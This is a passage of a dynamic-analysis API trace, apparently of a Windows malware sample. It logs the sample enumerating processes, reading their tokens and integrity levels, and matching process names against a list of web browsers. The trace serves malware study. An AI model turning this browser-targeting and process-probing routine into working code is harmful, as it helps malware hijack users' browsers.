(lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0218.065] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0218.065] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0218.065] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0218.065] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0218.065] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0218.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x374 [0218.065] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.065] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.065] GetLastError () returned 0x7a [0218.065] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.065] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.065] CloseHandle (hObject=0x36c) returned 1 [0218.065] CloseHandle (hObject=0x374) returned 1 [0218.065] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x374 [0218.065] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d8350, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.065] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.065] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.065] GetLastError () returned 0x7a [0218.065] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.065] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.066] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.066] CloseHandle (hObject=0x36c) returned 1 [0218.066] CloseHandle (hObject=0x374) returned 1 [0218.066] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0218.066] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0218.066] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0218.066] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0218.066] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0218.066] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0218.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x374 [0218.066] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.066] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.066] GetLastError () returned 0x7a [0218.066] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.066] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.066] CloseHandle (hObject=0x36c) returned 1 [0218.066] CloseHandle (hObject=0x374) returned 1 [0218.066] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x374 [0218.066] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d84c8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.066] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.066] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.066] GetLastError () returned 0x7a [0218.067] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.067] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.067] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.067] CloseHandle (hObject=0x36c) returned 1 [0218.067] CloseHandle (hObject=0x374) returned 1 [0218.067] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0218.067] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0218.067] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0218.067] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0218.067] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0218.067] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0218.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x374 [0218.067] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.067] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.067] GetLastError () returned 0x7a [0218.067] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.067] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.067] CloseHandle (hObject=0x36c) returned 1 [0218.067] CloseHandle (hObject=0x374) returned 1 [0218.067] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x374 [0218.067] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d8628, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.067] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.067] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.067] GetLastError () returned 0x7a [0218.067] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.067] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.067] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.067] CloseHandle (hObject=0x36c) returned 1 [0218.067] CloseHandle (hObject=0x374) returned 1 [0218.068] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0218.068] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0218.068] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0218.068] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0218.068] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0218.068] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0218.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x374 [0218.068] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.068] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.068] GetLastError () returned 0x7a [0218.068] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.068] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.068] CloseHandle (hObject=0x36c) returned 1 [0218.068] CloseHandle (hObject=0x374) returned 1 [0218.068] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x374 [0218.068] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d87a8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.068] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.068] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.068] GetLastError () returned 0x7a [0218.068] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.068] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.068] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.068] CloseHandle (hObject=0x36c) returned 1 [0218.068] CloseHandle (hObject=0x374) returned 1 [0218.068] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0218.068] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0218.068] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0218.068] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0218.068] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0218.068] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0218.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0218.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0218.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0218.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0218.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0218.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x374 [0218.069] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.069] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.069] GetLastError () returned 0x7a [0218.069] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.069] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.069] CloseHandle (hObject=0x36c) returned 1 [0218.069] CloseHandle (hObject=0x374) returned 1 [0218.069] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x374 [0218.069] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d8d80, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.069] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.069] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.069] GetLastError () returned 0x7a [0218.069] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.069] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.069] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.069] CloseHandle (hObject=0x36c) returned 1 [0218.069] CloseHandle (hObject=0x374) returned 1 [0218.069] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0218.069] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0218.069] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0218.069] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0218.069] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0218.069] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0218.069] VirtualFree (lpAddress=0x2d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0218.070] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0220.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xcc30) returned 0xc0000004 [0220.670] VirtualAlloc (lpAddress=0x0, dwSize=0xdc30, flAllocationType=0x1000, flProtect=0x4) returned 0x2d0000 [0220.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2d0000, Length=0xdc30, ResultLength=0x0 | out: SystemInformation=0x2d0000, ResultLength=0x0) returned 0x0 [0220.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0220.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0220.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0220.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0220.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0220.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0220.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0220.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0220.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0220.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0220.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0220.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0220.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0220.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0220.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0220.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0220.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0220.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0220.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0220.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0220.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0220.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x584 [0220.674] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.674] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.674] GetLastError () returned 0x7a [0220.674] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.675] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.675] CloseHandle (hObject=0x58c) returned 1 [0220.675] CloseHandle (hObject=0x584) returned 1 [0220.675] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x584 [0220.675] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2da1f8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.675] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.675] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.675] GetLastError () returned 0x7a [0220.676] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.676] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.676] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.676] CloseHandle (hObject=0x58c) returned 1 [0220.676] CloseHandle (hObject=0x584) returned 1 [0220.677] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0220.677] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0220.677] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0220.677] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0220.677] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0220.677] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0220.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x584 [0220.677] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.677] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.677] GetLastError () returned 0x7a [0220.677] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.677] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.678] CloseHandle (hObject=0x58c) returned 1 [0220.678] CloseHandle (hObject=0x584) returned 1 [0220.678] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.678] OpenProcess 